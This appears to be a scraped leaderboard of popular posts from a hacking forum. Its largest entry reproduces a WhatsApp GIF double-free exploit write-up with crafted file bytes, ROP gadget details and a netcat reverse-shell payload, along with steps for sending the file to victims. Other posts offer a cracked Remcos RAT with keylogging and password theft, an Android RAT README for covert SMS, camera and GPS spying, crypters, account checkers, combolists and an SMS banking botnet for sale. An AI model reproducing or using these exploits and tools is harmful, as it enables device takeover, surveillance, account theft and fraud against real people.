Leaderboard

The search index is currently processing. Leaderboard results may not be complete.

Popular Content

Showing content with the highest reputation since 10/20/2019 in all areas

  1. 10 points
    my old crypter. cleaned [Hidden Content]
  2. 7 points
  3. 7 points
    [hide] Whatsaap Bug October 22, 2019 How a double-free bug in WhatsApp turns to RCE 14 minute read ON THIS PAGE DEMO DOUBLE-FREE VULNERABILITY IN DDGIFSLURP IN DECODING.C IN LIBPL_DROIDSONROIDS_GIF CONTROLLING PC REGISTER DEALING WITH ASLR AND W^X PUTTING EVERYTHING TOGETHER AFFECTED VERSIONS ATTACK VECTORS In this blog post, I’m going to share about a double-free vulnerability that I discovered in WhatsApp for Android, and how I turned it into an RCE. I informed this to Facebook. Facebook acknowledged and patched it officially in WhatsApp version 2.19.244. Facebook helped to reserve CVE-2019-11932 for this issue. WhatsApp users, please do update to latest WhatsApp version (2.19.244 or above) to stay safe from this bug. Demo [Hidden Content] Google Drive link to download if the above link is not accessible [Hidden Content] The steps are as below: 0:16 Attacker sends GIF file to user via any channelsOne of them could be as Document via WhatsApp (i.e. pressing the Paper Clip button and choose Document to send the corrupted GIF) If the attacker is in the contact list of the user (i.e. a friend), the corrupted GIF is downloaded automatically without any user interaction. 0:24 User wants to send a media file to any of his/her WhatsApp friend. So the user presses on the Paper clip button and opens the WhatsApp Gallery to choose a media file to send to his friend.Take note that the user does not have to send anything because just opening the WhatsApp Gallery will trigger the bug. No additional touch after pressing WhatsApp Gallery is necessary. 0:30 Since WhatsApp shows previews of every media (including the GIF file received), it will trigger the double-free bug and our RCE exploit. Double-free vulnerability in DDGifSlurp in decoding.c in libpl_droidsonroids_gif When a WhatsApp user opens Gallery view in WhatsApp to send a media file, WhatsApp parses it with a native library called libpl_droidsonroids_gif.so to generate the preview of the GIF file. libpl_droidsonroids_gif.so is an open-source library with source codes available at [Hidden Content]. A GIF file contains multiple encoded frames. To store the decoded frames, a buffer with name rasterBits is used. If all frames have the same size, rasterBits is re-used to store the decoded frames without re-allocation. However, rasterBits would be re-allocated if one of three conditions below is met: width * height > originalWidth * originalHeight width - originalWidth > 0 height - originalHeight > 0 Re-allocation is a combination of free and malloc. If the size of the re-allocation is 0, it is simply a free. Let say we have a GIF file that contains 3 frames that have sizes of 100, 0 and 0. After the first re-allocation, we have info->rasterBits buffer of size 100. In the second re-allocation of 0, info->rasterBits buffer is freed. In the third re-allocation of 0, info->rasterBits is freed again. This results in a double-free vulnerability. The triggering location can be found in decoding.c: int_fast32_t widthOverflow = gifFilePtr->Image.Width - info->originalWidth; int_fast32_t heightOverflow = gifFilePtr->Image.Height - info->originalHeight; const uint_fast32_t newRasterSize = gifFilePtr->Image.Width * gifFilePtr->Image.Height; if (newRasterSize > info->rasterSize || widthOverflow > 0 || heightOverflow > 0) { void *tmpRasterBits = reallocarray(info->rasterBits, newRasterSize, <<-- double-free here sizeof(GifPixelType)); if (tmpRasterBits == NULL) { gifFilePtr->Error = D_GIF_ERR_NOT_ENOUGH_MEM; break; } info->rasterBits = tmpRasterBits; info->rasterSize = newRasterSize; } In Android, a double-free of a memory with size N leads to two subsequent memory-allocation of size N returning the same address. (lldb) expr int $foo = (int) malloc(112) (lldb) p/x $foo (int) $14 = 0xd379b250 (lldb) p (int)free($foo) (int) $15 = 0 (lldb) p (int)free($foo) (int) $16 = 0 (lldb) p/x (int)malloc(12) (int) $17 = 0xd200c350 (lldb) p/x (int)malloc(96) (int) $18 = 0xe272afc0 (lldb) p/x (int)malloc(180) (int) $19 = 0xd37c30c0 (lldb) p/x (int)malloc(112) (int) $20 = 0xd379b250 (lldb) p/x (int)malloc(112) (int) $21 = 0xd379b250 In the above snippet, variable $foo was freed twice. As a result, the next two allocations ($20 and $21) return the same address. Now look at struct GifInfo in gif.h struct GifInfo { void (*destructor)(GifInfo *, JNIEnv *); <<-- there's a function pointer here GifFileType *gifFilePtr; GifWord originalWidth, originalHeight; uint_fast16_t sampleSize; long long lastFrameRemainder; long long nextStartTime; uint_fast32_t currentIndex; GraphicsControlBlock *controlBlock; argb *backupPtr; long long startPos; unsigned char *rasterBits; uint_fast32_t rasterSize; char *comment; uint_fast16_t loopCount; uint_fast16_t currentLoop; RewindFunc rewindFunction; <<-- there's another function pointer here jfloat speedFactor; uint32_t stride; jlong sourceLength; bool isOpaque; void *frameBufferDescriptor; }; We then craft a GIF file with three frames of below sizes: sizeof(GifInfo) 0 0 When the WhatsApp Gallery is opened, the said GIF file triggers the double-free bug on rasterBits buffer with size sizeof(GifInfo). Interestingly, in WhatsApp Gallery, a GIF file is parsed twice. When the said GIF file is parsed again, another GifInfo object is created. Because of the double-free behavior in Android, GifInfo info object and info->rasterBits will point to the same address. DDGifSlurp() will then decode the first frame to info->rasterBits buffer, thus overwriting info and its rewindFunction(), which is called right at the end of DDGifSlurp() function. Controlling PC register The GIF file that we need to craft is as below: 47 49 46 38 39 61 18 00 0A 00 F2 00 00 66 CC CC FF FF FF 00 00 00 33 99 66 99 FF CC 00 00 00 00 00 00 00 00 00 2C 00 00 00 00 08 00 15 00 00 08 9C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F0 CE 57 2B 6F EE FF FF 2C 00 00 00 00 1C 0F 00 00 00 00 2C 00 00 00 00 1C 0F 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2C 00 00 00 00 18 00 0A 00 0F 00 01 00 00 3B It contains four frames: Frame 1:2C 00 00 00 00 08 00 15 00 00 08 9C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F0 CE 57 2B 6F EE FF FF Frame 2:2C 00 00 00 00 1C 0F 00 00 00 00 Frame 3:2C 00 00 00 00 1C 0F 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Frame 4:2C 00 00 00 00 18 00 0A 00 0F 00 01 00 00 The below sequence is what happened when WhatsApp Gallery is opened: First parse:Init:GifInfo *info = malloc(168); Frame 1:info->rasterBits = reallocarray(info->rasterBits, 0x8*0x15, 1); Frame 2:info->rasterBits = reallocarray(info->rasterBits, 0x0*0xf1c, 1); Frame 3:info->rasterBits = reallocarray(info->rasterBits, 0x0*0xf1c, 1); Frame 4:does not matter, it is there to make this GIF file valid Second parse:Init:GifInfo *info = malloc(168); Frame 1:info->rasterBits = reallocarray(info->rasterBits, 0x8*0x15, 1); Frame 2, 3, 4:does not matter End:info->rewindFunction(info); Because of the double-free bug occuring in the first parse, info and info->rasterBits now points to the same location. With the first frame crafted as said, we could control rewindFunction and PC when info->rewindFunction(info); is called. Take note that the frames are all LZW encoded. We must use an LZW encoder to encode the frames. The above GIF triggers crash as below: --------- beginning of crash 10-02 11:09:38.460 17928 18059 F libc : Fatal signal 6 (SIGABRT), code -6 in tid 18059 (image-loader), pid 17928 (com.whatsapp) 10-02 11:09:38.467 1027 1027 D QCOM PowerHAL: LAUNCH HINT: OFF 10-02 11:09:38.494 18071 18071 I crash_dump64: obtaining output fd from tombstoned, type: kDebuggerdTombstone 10-02 11:09:38.495 1127 1127 I /system/bin/tombstoned: received crash request for pid 17928 10-02 11:09:38.497 18071 18071 I crash_dump64: performing dump of process 17928 (target tid = 18059) 10-02 11:09:38.497 18071 18071 F DEBUG : *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** 10-02 11:09:38.497 18071 18071 F DEBUG : Build fingerprint: 'google/taimen/taimen:8.1.0/OPM1.171019.011/4448085:user/release-keys' 10-02 11:09:38.497 18071 18071 F DEBUG : Revision: 'rev_10' 10-02 11:09:38.497 18071 18071 F DEBUG : ABI: 'arm64' 10-02 11:09:38.497 18071 18071 F DEBUG : pid: 17928, tid: 18059, name: image-loader >>> com.whatsapp <<< 10-02 11:09:38.497 18071 18071 F DEBUG : signal 6 (SIGABRT), code -6 (SI_TKILL), fault addr -------- 10-02 11:09:38.497 18071 18071 F DEBUG : x0 0000000000000000 x1 000000000000468b x2 0000000000000006 x3 0000000000000008 10-02 11:09:38.497 18071 18071 F DEBUG : x4 0000000000000000 x5 0000000000000000 x6 0000000000000000 x7 7f7f7f7f7f7f7f7f 10-02 11:09:38.497 18071 18071 F DEBUG : x8 0000000000000083 x9 0000000010000000 x10 0000007da3c81cc0 x11 0000000000000001 10-02 11:09:38.497 18071 18071 F DEBUG : x12 0000007da3c81be8 x13 ffffffffffffffff x14 ff00000000000000 x15 ffffffffffffffff 10-02 11:09:38.497 18071 18071 F DEBUG : x16 00000055b111efa8 x17 0000007e2bb3452c x18 0000007d8ba9bad8 x19 0000000000004608 10-02 11:09:38.497 18071 18071 F DEBUG : x20 000000000000468b x21 0000000000000083 x22 0000007da3c81e48 x23 00000055b111f3f0 10-02 11:09:38.497 18071 18071 F DEBUG : x24 0000000000000040 x25 0000007d8bbff588 x26 00000055b1120670 x27 000000000000000b 10-02 11:09:38.497 18071 18071 F DEBUG : x28 00000055b111f010 x29 0000007da3c81d00 x30 0000007e2bae9760 10-02 11:09:38.497 18071 18071 F DEBUG : sp 0000007da3c81cc0 pc 0000007e2bae9788 pstate 0000000060000000 10-02 11:09:38.499 18071 18071 F DEBUG : 10-02 11:09:38.499 18071 18071 F DEBUG : backtrace: 10-02 11:09:38.499 18071 18071 F DEBUG : #00 pc 000000000001d788 /system/lib64/libc.so (abort+120) 10-02 11:09:38.499 18071 18071 F DEBUG : #01 pc 0000000000002fac /system/bin/app_process64 (art::SignalChain::Handler(int, siginfo*, void*)+1012) 10-02 11:09:38.499 18071 18071 F DEBUG : #02 pc 00000000000004ec [vdso:0000007e2e4b0000] 10-02 11:09:38.499 18071 18071 F DEBUG : #03 pc deadbeeefffffffc <unknown> Dealing with ASLR and W^X After controlling the PC, we want to achieve remote code execution. In Android, we can not execute code on non-executable regions due to W^X (i.e. stack and heap). The easiest way to deal with W^X in our case is to execute the below command: system("toybox nc 192.168.2.72 4444 | sh"); For that, we need PC to point to system() function in libc.so and X0 to point to "toybox nc 192.168.2.72 4444 | sh". This cannot be done directly. We need to first let PC jumps to an intermediate gadget, which sets X0 to point to "toybox nc 192.168.2.72 4444 | sh" and jump to system(). From the disassembly code around info->rewindFunction(info);, we can see that both X0 and X19 point to info->rasterBits (or info, because they both point to the same location), while X8 is actually info->rewindFunction. Disassembly around info->rewindFunction There is a gadget in libhwui.so that perfectly satisfies our purpose: ldr x8, [x19, #0x18] add x0, x19, #0x20 blr x8 Let say the address of the above gadget is AAAAAAAA and the address of system() function is BBBBBBBB. The rasterBits buffer (frame 1) before LZW encoding look as below: 00000000: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 00000010: 0000 0000 0000 0000 4242 4242 4242 4242 ........BBBBBBBB 00000020: 746f 7962 6f78 206e 6320 3139 322e 3136 toybox nc 192.16 00000030: 382e 322e 3732 2034 3434 3420 7c20 7368 8.2.72 4444 | sh 00000040: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 00000050: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 00000060: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 00000070: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 00000080: 4141 4141 4141 4141 eeff AAAAAAAA.. In a normal Android system, because every processes are spawned from Zygotes, even with ASLR our addresses AAAAAAAA and BBBBBBBB do not change if WhatsApp is killed and restarted. However, they cannot persist a system reboot. To have reliable AAAAAAAA and BBBBBBBB, we need an information disclosure vulnerability that gives us the base address of libc.so and libhwui.so. That vulnerability is beyond scope of this blogpost. Putting everything together Just compile the code in this repo. Note that the address of system() and the gadget must be replaced by the actual address found by an information disclosure vulnerability (which is not covered in this blog post). /* Gadget g1: ldr x8, [x19, #0x18] add x0, x19, #0x20 blr x8 */ size_t g1_loc = 0x7cb81f0954; <<-- replace this memcpy(buffer + 128, &g1_loc, 8); size_t system_loc = 0x7cb602ce84; <<-- replace this memcpy(buffer + 24, &system_loc, 8); Run the code to generate the corrupted GIF file: [email protected]:~/Desktop/gif$ make ..... ..... ..... [email protected]:~/Desktop/gif$ ./exploit exploit.gif buffer = 0x7ffc586cd8b0 size = 266 47 49 46 38 39 61 18 00 0A 00 F2 00 00 66 CC CC FF FF FF 00 00 00 33 99 66 99 FF CC 00 00 00 00 00 00 00 00 00 2C 00 00 00 00 08 00 15 00 00 08 9C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 84 9C 09 B0 C5 07 00 00 00 74 DE E4 11 F3 06 0F 08 37 63 40 C4 C8 21 C3 45 0C 1B 38 5C C8 70 71 43 06 08 1A 34 68 D0 00 C1 07 C4 1C 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 12 7C C0 C5 07 00 00 00 EE FF FF 2C 00 00 00 00 1C 0F 00 00 00 00 2C 00 00 00 00 1C 0F 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2C 00 00 00 00 18 00 0A 00 0F 00 01 00 00 3B Then copy exploit.gif file and send it as Document with WhatsApp to another WhatsApp user. Take note that it must not be sent as a Media file, otherwise WhatsApp tries to convert it into an MP4 before sending. Upon the user receives the malicous GIF file, nothing will happen until the user open WhatsApp Gallery to send a media file to his/her friend. Affected versions The exploit works well until WhatsApp version 2.19.230. The vulnerability is official patched in WhatsApp version 2.19.244 The exploit works well for Android 8.1 and 9.0, but does not work for Android 8.0 and below. In the older Android versions, double-free could still be triggered. However, because of the malloc calls by the system after the double-free, the app just crashes before reaching to the point that we could control the PC register. Note that Facebook informed the developer of android-gif-drawable repo about the issue. The fix from Facebook was also merged into the original repo in a commit from August 10th. Version 1.2.18 of android-gif-drawable is safe from the double-free bug. Attack vectors With the above exploitation, we can have two attack vectors: Local privilege escaltion (from a user app to WhatsApp): A malicious app is installed on the Android device. The app collects addresses of zygote libraries and generates a malicious GIF file that results in code execution in WhatsApp context. This allows the malware app to steal files in WhatsApp sandbox including message database. Remote code execution: Pairing with an application that has an remote memory information disclosure vulnerability (e.g. browser), the attacker can collect the addresses of zygote libraries and craft a malicious GIF file to send it to the user via WhatsApp (must be as an attachment, not as an image through Gallery Picker). As soon as the user opens the Gallery view in WhatsApp (who never sends media files to friends, right?), the GIF file will trigger a remote shell in WhatsApp context.
  4. 5 points
    Fʀᴇᴇ VPS Wɪɴᴅᴏᴡs Gᴏᴏɢʟᴇ Cʟᴏᴜᴅ ɴᴏ Cʀᴇᴅɪᴛ Cᴀʀᴅ 2019 ᴛʏᴘᴇ : ᴠɪᴅᴇᴏ ᴛᴜᴛᴏʀɪᴀʟ sɪᴢᴇ : 27 MB Sɪᴛᴇ Lɪɴᴋ : [Hidden Content] Cᴏᴅᴇ :- [Hidden Content] Tutorial: [HIDE][Hidden Content]]
  5. 4 points
    [Hidden Content]
  6. 4 points
    Descripción In this Reverse Engineering and Exploit Development training course, expert author Philip Polstra will teach you about common software vulnerabilities and how to find them, as well as how the vulnerabilities differ between various operating systems. This course is designed for beginners who are looking to get started in security, penetration testing, and reverse engineering. You will start by learning about reversing compiled Windows applications, including using fuzzing, stack overflows, and heap overflows. From there, Philip will teach you how to reverse compiled OS X, Linux, and Android applications. This video tutorial also covers how to find other vulnerabilities, including website and database vulnerabilities. Finally, you will learn about simple exploits, web exploitation, and ARM exploitation. Once you have completed this computer based training course, you will be fully capable of finding vulnerabilities and developing exploits for them. Working files are included, allowing you to follow along with the author throughout the lessons. [Hidden Content] [HIDE][Hidden Content]]
  7. 4 points
    Features: * 2 Modes (Checker Mode, Data Changer) * Rotating Proxy Support * Faster Than Multi-Checkers * Captures All Plans (UHD, HD, BASIC and SCREENS) [HIDE][Hidden Content]]
  8. 4 points
  9. 4 points
    Recently, botnet recently loaded with Android. This malware can send and intercept sms from bots. Will most of androids by Will of botnets Like, for for They are Used Mainly for mobile Banks, such as with the with the .... In EU, you can transfer money from one card to another card via mobile sms This botnet sold $ 120
  10. 4 points
    6KB Server [Hidden Content]
  11. 3 points
    [HIDE][Hidden Content]]
  12. 3 points
  13. 3 points
  14. 3 points
    [HIDE][Hidden Content]]
  15. 3 points
  16. 3 points
    [Hidden Content]
  17. 3 points
  18. 3 points
    Capture: Full Proxies: Yes Email:Pass Bots: 100/150 [Hidden Content]
  19. 3 points
  20. 3 points
    Assassin one of the best Android RAT beta 1.0.0 adapter android Lollipop-Pie commit issues to me Construction Features get Sms_List send Sms to destinationAddress get Calling_History get GPS get Contacts_List something that u can do in background call someone take a photo then send to server record audio then send to server record video then send to server of course the duration decided by yourself Basement/Environment Gradle JDK1.8 AndroidSdk node.js npm Usage Options: -V, --version output the version number -a,--assassin <assassin> select a command post to the clients if you choose the shadow you should input the cmd -t to choose a type between pic/audio/video [sms,contacts,call,gps,shadow] (default: "sms") -C,--Clients show every client info -d,--address <address> input a phone num who you want to send a msg -m,--msg <msg> you should write the msg content, if your command is sms -t,--type <type> select a type between pic/audio/video and you should input the -l to choose the camera lens [pic,audio,video] -c,--client <client> select a client to post the command -l,--lens <lens> which camera lens that you want to open [0,1] -h, --help output usage information Step.1 clone/download the project and start up the server [Hidden Content] Step.2 build assasin.apk with shell at project folder befor build the apk confrim that you have prepare the env for building the app connect the android device to ur PC enable the develop mode on ur android device if you can not do step.2 and step.3 you can build the assassin.apk and install it to your device manually now let's start assembleApk at the first time when you download the project you should confirm your OS type mac or linux, and get your server IPAdress by "ifconfig/ipconfig" 0. chmod 777 ./assembleApk.sh chmod 777 ./installNewestApk.sh 1. execute the assemble shell "./assaembleApk.sh OS serverIP" serverIP type as 127.0.0.1:3000 OS type as mac or linux as follows: "./assembleApk.sh mac 127.0.0.1:3000" "./assembleApk.sh linux localHost:3000" 2. ./installNewestApk.sh if you are not able to connect the device to your PC, send the apk by email or xx and install it manually 3. look at your device, the apk has been installed into your device run it grant all of permissions and now you can see { a user connected info }at terminal you have opened at Step.1 Step.3 execute command,then you will get whaterver you want!!! cmd ./assassin.js -a sms -c 9910294050493 description select the command between [sms,contacts,call,gps,shadow] if you choose the shadow you should also use -t to choose a type between pic/audio/video args with -c can be gotten at server terminal {a user connected info} type the cmd into a new terminal at ~/project/Server and the result: { "command": "send_contacts_list", "IMEI": "99001249798100" } response is : [{name:ASX,phoneNum:2345 67}] exemples cmd -a description select the command between [sms,contacts,call,gps,shadow] if you choose the shadow you should also use -t to choose a type between pic/audio/video example ‘’./assassin.js -a sms‘’ ‘’ ./assassin.js -a shadow -t pic ‘’ result ERROR:you should input a type with -c to choose a client that you want to send cmd cmd -C description show every client info example ‘’./assassin.js -C ‘’ result {IMEI:9525238415950202,brand:Nokia,model:CAL-20,version:9.0} cmd -c description select a client with its IMEI to post the command example ‘’./assassin.js -a sms -c 9525238415950202 ‘’ result { command: 'send_sms_list', IMEI: '184859203' } Prompt keep node server alive when you send a command cmd with ./assassin.js will return a Json data you can do whatever with the response if you want to get a pic or video you should type the cmd as follow: ./assassin.js -a shadow -c 123456 -t pic -l 0 then you can find the pic has saved on the */project/Server/public/images/xxxx.jpeg' the same with other shadow the duration in recording video or audio decided by yourself Screen Shot server assembleApk installApk client connect to server executeCmd
  21. 3 points
    [HIDE] Cloudflare Resolver [Hidden Content]: cracked.to => 104.24.2.112 (USA) [CloudFlare IP] www.cracked.to => 104.24.1.112 (USA) [CloudFlare IP] dev.cracked.to => 104.24.1.112 (USA) [CloudFlare IP] Cloudflare token bypassed this forum have firewall but DW))) [Hidden Content]]
  22. 3 points
    REMCOS Professional v1.7 (Cracked and Fixed) Remcos is a lightweight and fast Remote Administration Tool with a wide array of functionalities, contained in a tiny package The Server part, written in C++, is only ~90 kb of size uncompressed and contains all the functions. Performance and speed have been a priority in the development. INFO No dependencies, and fully compatible with any Windows from WinXP to Win10, 32-64 bit, including Server editions. Remcos will not require any extra dependency to run. All it needs is contained in any standard Windows installation. Robust connection: * Robust Keep alive system makes sure your connection with the remote host/s will never get lost. * 100% Encrypted connection protects transmitted data from sniffers. Not a single byte is sent un-encrypted. * Backup connection addresses will make sure your remote host will connect even if one or more addresses go offline. Auto-Tasks: You don't even have to sit at the computer: Download logs and files, and performs other actions automatically on hosts connection. Mass Commands: You can send any command to more then one remote host, or even to all the connected ones in same time. Search for a file name on all your machines network, download&execute a file, shutdown all of them and much more. Surveillance functions: Transform the remote machine in a completely stealth surveillance station. *Password recovery lets you recover remotely saved passwords from all browsers (IE, Firefox, Chrome, Safari, Opera), and various Instant Messaging software (Pidgin, Trillian, Miranda, ICQ, and more.) And from MS Outlook POP3, IMAP...etc *ScreenLogger takes screenshots on a time-interval basis or when the user opens some chosen windows, webpages or programs. SS's are stored encrypted and are erased when the remote operator retrieves them. *Offline Keylogger stores logs totally encrypted, and will wipe them out after sending them to C&C operator. *Online Keylogger lets you see what remote user types (and which window opens) in realtime. *Camera Capture lets you capture a live stream of the remote camera, and save frames to disk. *Microphone Capture lets you capture the audio from the machine's microphone in real-time, or even when you are offline, storing audio files. Extra-Stealth: Want to use Remcos as a stealthy remote surveillance tool? Process Injection, Anti-Analysis techniques, total encryption of connection and stored logs, and full compatibility with exe Protectors, will make it hard to spot. Connections Interface Here you can view all connected hosts,and send commands to one or more of them. Wide array of functions which can be performed on one or more hosts at the same time. Despite its wide range of functionalities, Remcos Server its contained in a single ~90 kb C++ executable. That's because performance has always been a priority in the development, as well as maximum compatibility with any Windows system. Password Recovery Recover remote passwords from any popular browser: Internet Explorer - Google Chrome - Mozilla Firefox - Safari - Opera and from MS Outlook POP3, IMAP...etc and from a wide variety of Instant Messaging software: Pidgin - Trillian - Miranda - ICQ - Digsby - PaltalkScene - Windows MSN/Live Messenger ScreenLogger take automatically screenshots offline, and store them encrypted. View and download screenshots comfortably anytime. Screenshots can be taken each x minutes, or when window title or webpage contains a word from a word-list. This allows you to take screenshots automatically anytime the user opens some webpage or application of interest. Keylogger Remcos includes powerful and versatile Keylogger functionality. Offline Keylogger will automatically log data and store it encrypted on the remote machine. You can retrieve it anytime, manually or automatically via AutoTasks. Remcos Keylogger captures: Keystrokes - Active Window - Clipboard Copy/Paste - Idle time Online Keylogger let's you see what's going on in realtime, without storing any remote log! Any single keystroke will be displayed as soon as typed. Selective Keylogger Want to capture only user input which happens in one or more defined windows, programs or webpages? With the Selective Keylogger mode, the Keylogger will self-activate when user enters a target window, and will self-disable when exits from it. Automatic Tasks Automatically send tasks to hosts as soon as they connect. Download logs and files, update/uninstall your remote client, and more. Without needing your physical presence at the PC. Download: [Hide][Hidden Content]] Password: level23hacktools.com
  23. 2 points
  24. 2 points
  25. 2 points
    [Hidden Content]
  26. 2 points
  27. 2 points
    Proxies: Yes Capture: No Hits = Good Accounts Email:Pass - [Mail-Access] [HIDE][Hidden Content]]
  28. 2 points
  29. 2 points
  30. 2 points
    Capture: Country / Subscription / Renewal Proxies: No but you can if you want. CPM: 2000+ bots: 150 [HIDE][Hidden Content]]
  31. 2 points
  32. 2 points
  33. 2 points
  34. 2 points
  35. 2 points
    Есть рабочие. не меняйте пароль [HIDE][Hidden Content]]
  36. 2 points
    Proxies: Yes Capture: Plan Bots: 100 User:Pass [HIDE][Hidden Content]]
  37. 2 points
    [Hidden Content]
  38. 2 points
    Capture: end date Proxies: Yes Email:Pass Lolix [HIDE][Hidden Content]]
  39. 2 points
    Spotify Checker By Xsphere Updated [Console Vesion] Download: [HIDE][Hidden Content]]
  40. 2 points
    Proxies: Yes - Socks4/5 Public/Private Email:Pass What's Modded? Netflix URL login Free Keywords Failure Keywords Good Keywords [Hidden Content]
  41. 2 points
    Email:Pass Proxies: Yes - Socks4/5 Public Export Accounts before you close the tool ** Modded: login URL and Good Keywords ** [HIDE][Hidden Content]]
  42. 2 points
  43. 2 points
    [Hidden Content]
  44. 2 points
    [HIDE][Hidden Content]]
  45. 2 points
  46. 2 points
    AV scanner 10 scans for free Password to scan - BNTtMGKuwpgl [HIDE][Hidden Content]]
  47. 2 points
    550K Combolist HQ Email:Pass (Netflix,Gaming,Porn,VPN,etc) HITS GUARANTEED [hide][Hidden Content]]
  48. 2 points
    Seo Tools 2018 1 1clickcashbot A AAC Trackback Submitter 6 ActiveCampaign Email Marketing AdQuick 2.1 AdSense Firestorm Adsense Goldmine 3.3 AdText Generator 2.2.6 Advanced Emailer 6.9 AffiloTheme 4.0.1529 Affpressor All In Scraper 1.1.39 All-In-One SEO Pack PRO 1.74.00 All In One Protector 4.03 Amaniche 3.0 aMember Pro 4.2.3 Analytic Call Tracking Answer Analyst 1.443 Answer Assault 2.0.1.0 Answer Eye Pro 13 Article Architect Article Bot 2.0 Article Marketing Robot 1.1.0.7 Article Spinner 3.0.2.0 Article Submitter 2.0 Article Submitter Plus 1.1.0 Artisteer 3.0 Atomic Email Hunter 3.50 Atomic Mail Sender 4.27 AI Roboform Enterprise 7.8.4.5 Authority Link Software 1.4 Authority Pro 2 Auto Hide IP 5.3.0.2 Auto Keyword Robot Auto Social Poster Pro 3.9 Auto Tube Press AutoBlogged 2.9.1 AutoBlog Samurai Pro Automated Webinar Generator AutoPligg Desktop 6.0.1.8 Autopress Pro 1.0.9 B Backlink Booster Backlink Energizer 1.6 Backlink Index Expressbie 9 Backlink Power Indexer Backlink Profit Monster 3.0.4 Backlink Skyrocket 1.5.3 Backlink Topia Pro 3.3.2.0 Backlink Speed 2.4 Backlinker 3.4 Backpage Autoposter BackupBuddy 3.0.38 Backup Creator Best Instagram Bot 4.1 Blackhat Viral WP Plugin Blog Bot 1.0 Blog Post Automator Blogger Zon Poster 2.9.9 Botstagram 1.1.8.0 Bookmarking Demon 5.6.1.3 Brute Force SEO EVO2 C Camtasia Studio 8.0 Captcha Infinity Captcha Sniper X2 CB Goliath 4.1.5 ClassiPress 3.1.5 ClickBump SEO Comment Ninja 0.6 Comment Scrape Boss Content Mania Content Solution Content Revenge 2.06 Content Samurai CouponPress 6.2.2 CPA Blaster 1.96 Craigslist Mailer 2.0.1.0 CTR Theme 1.4.15 Curation Fire D Deep Linker Pro 2.0 [BONUS] Digi Article Blaster Digi Auto Links 2.1.5 Digi Exit Pop Digi Launchpad 1.3 Digi Link Doctor 1.3.1 Digi List Builder 1.6 Digi Social Squeeze 1.1 Digi Traffic Accelerator Digi Traffic Mulitplier 1.5.2 Digital Access Pass 4.3.1 Digital Product Demon Directory Submitter 4.0 DL Guard 4.6 DoFellow Domain Name Dominator E Easy Azon Easy Redirect Script 4.0 Easy Spin Master Pro Easy Video Player 2.2 [BONUS] Easy Webinar Plugin Easy WP SEO 1.7 ECrawl 2.60 Email Search Crawler 2.75 Email Sender Deluxe 2.34 Exit Splash Exit Splash 2.2.5 WordPress Extreme Traffic Bot Extreme Wiki Poster 1.2.4 EZ Fanpage Generator 2.02.05 EzWPCloner F Facebook Blaster Pro 11 Facebook Friend Adder Facebook Friend Commenter 5.5 Facebook iFrame PRO Facebook Like Jacker Fake Hits Generator 2.0 Fast Blog Finder Fast Email Extractor 7.5 Fast Email Sender 5.0.0.0 Fast Member FB Creator 3.0 FB Like Viral 1.2.1 FB Tube Pro Fiverr Script 3.8 FlexSqueeze 1.5 Forum Bot 2.6 Forum Poster 3.30 Fresh Store Builder 2.6.3 [BONUS] Friend Adder Elite 2.0.2 G Get Article Pro Ghost CPA Gigsterr Bot Godaddy Auctions PR Checker Google Adsense Accelerator Plugin Google Plus Extreme GPScraper Gravity Forms 1.6.5.1 GSA Email Spider 5.30 H HeatMap PRO 5.2 HMA Proxy Grabber 2.0 Hotmail Account Creator Hot Item Finder 2.1.0.7 I Internet Business Promoter 12 Internet Download Manager 6.12 IgniteSEO 3.3.0 IM PowerSuite IM Slave Link Blaster 1.1 [BONUS] iMacros 8.02.1970 InstaBuilder InstaFlow Instant Articles Suite 1.10 Instant Article Wizard 3.086 Instant Backlink Magic 2.1a Instant Social Anarchy 1.5 Instant Video Articles Interspire Email Marketer 6.1.3 Interspire Shopping Cart 6.1.8 iPhorm 1.3.1 J JakoDorgen Pro JitBit Help Desk K Keyword Domainizer 1.9.0.27 Keyword Elite 2.0.18 Keyword Fighter 4.0 Keyword Mass 1.07 Keyword Ninja Keyword Prodigy Keyword Revenge 2.0.0.2 Keyword Scout 1.0.23 Keyword Snatcher 1.21 Keyword Sniper Pro 2.10.1020 Keyword Xtreme 3.0.24 Kontent Bot Kontent Machine 2.14 K-Soft RSS Submit 3.0 L LeadPlayer [BONUS] Licorne AIO 2.4 Link Automatic WP Plugin Link Farm Evolution 1.9.2 Link Thunder LinxBot 2.0 Live Email Verifier 6.0 M MachForm 3.2 Magic Affiliate Plugin 1.7.3 Magic Members 